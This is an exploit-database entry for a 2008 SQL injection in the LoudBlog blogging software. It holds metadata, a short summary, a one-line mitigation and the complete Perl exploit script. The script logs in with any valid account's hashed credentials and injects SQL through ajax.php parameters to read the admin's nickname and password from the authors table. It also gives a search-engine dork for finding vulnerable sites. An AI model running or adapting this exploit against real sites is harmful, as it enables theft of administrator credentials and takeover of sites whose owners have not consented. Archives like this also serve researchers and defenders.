header-logo
Suggest Exploit
vendor:
LoudBlog
by:
Xianur0
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: LoudBlog
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2008

LoudBlog Exploit All Version By Xianur0

This Exploit requires a valid user name and password of an account regardless of the permissions. It uses HTTP::Request::Common qw(POST) and LWP::UserAgent to send a POST request to the LoudBlog ajax.php page with the colpick, rowpick, rowval, and table parameters set. The User-Agent and Cookie headers are also set with the valid user's MD5 hash. The response contains the username and password of the admin account.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# This Exploit requires a valid user name and password of an account regardless of the permissions
#
# Author: Xianur0
# Affected: All Versions
# Bug: SQL Injection
# 
# Doorks:
#  allintext: "powered by LoudBlog"


  use HTTP::Request::Common qw(POST);
  use LWP::UserAgent;
  use Digest::MD5 qw(md5_hex);
  $ua = LWP::UserAgent->new;

print "\n             LoudBlog Exploit All Version By Xianur0\n\n";
$uri = $ARGV[0];
$id = $ARGV[1];
$password = $ARGV[3] || die("\nUse: loudblog.pl [URI] [ID Admin] [Valid User] [Valid Password]\n");
$md5 = md5_hex($ARGV[2]).":".md5_hex($password);

  my $req = POST $uri.'/loudblog/ajax.php',
                [ colpick => "concat(0x557365723a20,nickname,0x0d0a50617373776f72643a20,password)", rowpick => "id", rowval => $id, table => 'authors', action => 'singleread'];
$req->header('User-Agent' => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17');
$req->header('Cookie' => 'lbauth='.$md5);
$res = $ua->request($req);
  print $res->content."\n"; 

# milw0rm.com [2008-10-22]

Navigation

Suggest Exploit

Services By CQR